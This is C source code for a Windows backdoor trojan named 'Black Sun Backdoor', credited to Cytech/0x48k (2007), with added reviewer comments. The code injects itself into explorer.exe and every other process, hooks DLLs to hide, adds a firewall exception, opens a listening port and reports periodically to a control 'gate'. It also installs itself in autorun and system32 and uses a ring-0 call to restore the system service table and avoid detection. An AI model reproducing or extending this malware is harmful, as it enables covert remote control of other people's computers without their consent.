- /*
- * ---------------------------------------------------------------------
- * ____ _ _ _____
- * | _ \| | | | / ____|
- * | |_) | | __ _ ___| | _| (___ _ _ _ __
- * | _ <| |/ _` |/ __| |/ /\___ \| | | | '_ \
- * | |_) | | (_| | (__| < ____) | |_| | | | |
- * |____/|_|\__,_|\___|_|\_\_____/ \__,_|_| |_|
- * Black Sun Backdoor v1.0 prebeta
- *
- * (x) Cytech 2007
- *
- * ---------------------------------------------------------------------
- * [blacksun.c]
- * main functions :)
- * ---------------------------------------------------------------------
- * thnx to:
- * Cr4sh//0x48k, el-//0x48k, gorl, xhack//0x48k, Bill//TPOC
- * ---------------------------------------------------------------------
- */
- #include "headers.h"
- // ---------------------------------------------------------------------------------------
- // this function starts the splicing in every DLL of the infected process and in the process itself
- // + loads the modules without which nothing will work (imagehlp.dll and the others)
- // ---------------------------------------------------------------------------------------
- // Thread entry that pre-loads the DLL set below and then calls Stealth().
- // lpParam is unused. Always returns 0 (thread-routine convention), so callers
- // get no indication of whether any LoadLibrary call or Stealth() failed.
- // The *_DLL name macros and Stealth() are not defined in this unit
- // (presumably headers.h / another translation unit).
- static DWORD WINAPI StealthMain(LPVOID lpParam)
- {
- // NOTE(review): none of the LoadLibrary return values are checked, so a
- // module that fails to load is silently ignored before Stealth() runs.
- LoadLibrary(KERNEL32_DLL); // 1
- LoadLibrary(ADVAPI32_DLL); // 2
- LoadLibrary(IMGHLP_DLL); // 3
- LoadLibrary(SHELL32_DLL); // 4
- LoadLibrary(WS2_32_DLL); // 5
- LoadLibrary(URLMON_DLL); // 6
- LoadLibrary(WININET_DLL); // 7
- LoadLibrary(WINMM_DLL); // 8
- LoadLibrary(USER32_DLL); // 9
- Stealth(); // presumably performs the splicing described in the header comment - confirm in its definition
- return 0;
- }
- // -----------------------------------------------------------------------------------------
- // this code gets injected into explorer.exe and is the main body of the backdoor
- // -----------------------------------------------------------------------------------------
- // Main body of the injected payload: runs StealthMain in-process, optionally
- // registers with the firewall, starts the listener thread, then loops forever
- // (sleep while offline, spawn the report thread while online).
- // lpParam is unused. The while(TRUE) loop has no break, so the function never
- // returns normally and the trailing `return TRUE` is unreachable.
- static DWORD WINAPI BackdoorMain(LPVOID lpParam)
- {
- HANDLE hBindBackdoorThread,
- hzDownloaderThread; // NOTE(review): assigned only under USEGATE; neither handle is read, waited on or closed here
- StealthMain(NULL);
- #ifdef NETSHADD
- NetSHFirewallReg(); // register ourselves in the netsh firewall
- #endif NETSHADD // NOTE(review): extra tokens after #endif are not valid C; most compilers only warn
- InitWinSock2API(); // initialise the WinSock2 API
- // create the backdoor (listener) thread on BINDPORT
- hBindBackdoorThread = StartThread(Backdoor_Listen, (short)BINDPORT);
- while(TRUE)
- {
- // check the Internet connection... if there is none, sleep 1 minute and check again
- if (CheckInternetConnection() == 0)
- {
- Sleep(1*60*1000);
- continue;
- }
- // if connected, spawn the thread that sends the info to the gate, then sleep for the
- // configured period (15 minutes by default), then carry on the same way
- else if (CheckInternetConnection() == 1) // NOTE(review): a second probe, not the cached result of the first; the two may disagree
- {
- #ifdef USEGATE
- hzDownloaderThread = StartThread(ReportToStat, NULL);
- #endif USEGAGE // NOTE(review): "USEGAGE" is a typo for USEGATE; harmless only because the token is ignored
- Sleep(HTTPFREQ*60*1000); // HTTPFREQ is in minutes (defined elsewhere)
- }
- }
- return TRUE;
- }
- // ---------------------------------------------------------------------------------------
- // thread for injecting into explorer.exe
- // ---------------------------------------------------------------------------------------
- // Thread entry: injects BackdoorMain into the process named by FIRSTINJPROC.
- // lParam is unused. Always returns 0; the result of StartProcInject is discarded,
- // so a failed injection is not reported to the caller.
- DWORD WINAPI StartExplorerInjThread(LPVOID lParam)
- {
- StartProcInject(NULL, FIRSTINJPROC, BackdoorMain); // return value not checked
- return 0;
- }
- // ---------------------------------------------------------------------------------------
- // thread for injecting into all processes
- // ---------------------------------------------------------------------------------------
- // Thread entry: injects StealthMain into every process via InjectAllProcesses
- // (defined elsewhere). lParam is unused. Returns FALSE (0); note the sibling
- // StartExplorerInjThread returns the literal 0 for the same meaning.
- DWORD WINAPI StartAllProcInjThread(LPVOID lParam)
- {
- InjectAllProcesses(StealthMain); // return value not checked
- return FALSE;
- }
- // ---------------------------------------------------------------------------------------
- // gop-stop... we came at you from around the corner :D
- // ---------------------------------------------------------------------------------------
- // Process entry point. All of the real work is placed inside the __except
- // handler: the __try block deliberately writes through a null pointer so that
- // the access violation is raised and the handler runs (presumably an
- // obfuscation trick). The four parameters are the standard WinMain ones and
- // none of them is used. Always returns 0.
- int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
- {
- HANDLE hExplorerInj,
- hAllProcInj; // NOTE(review): both handles are assigned but never waited on or closed
- __try
- {
- PDWORD deadcoded = 0;
- *deadcoded = 0xd34dc0d3d; // null write -> access violation caught below; the 36-bit literal is truncated to a DWORD, never observable
- }
- __except(EXCEPTION_EXECUTE_HANDLER)
- {
- // restore the SST (System Service Table, presumably) so the injection is not detected.
- // Cr4sh deserves the thanks for this feature :)
- ReadSST((PDWORD)&sst); // sst is a file-scope global defined elsewhere
- CallR0((DWORD)&R0Func); // NOTE(review): name suggests R0Func runs at ring 0 - confirm in its definition
- // register ourselves in autorun (Run) and copy ourselves to system32
- AddSelfToRun("addtorun");
- // allow only one copy of the trojan to run, by creating a mutex
- CreateMutex(NULL,FALSE, MUTEXNAME); // handle is never closed; presumably held for the process lifetime
- // if the mutex already existed we bail out (we are not the first instance)
- if(GetLastError() == ERROR_ALREADY_EXISTS)
- {
- ExitProcess(0);
- }
- // inject the backdoor code into FIRSTINJPROC; from now on we run under its name.
- hExplorerInj = StartThread(StartExplorerInjThread, NULL);
- // infect all the remaining processes.
- hAllProcInj = StartThread(StartAllProcInjThread, NULL);
- }
- return 0; // reached right after the two StartThread calls; nothing here waits for the threads
- }
- // -------------------------------------------------------------//
- // Darkcoded by Cytech/0x48k, (x) 2007, hellknights.void.ru //
- // -------------------------------------------------------------//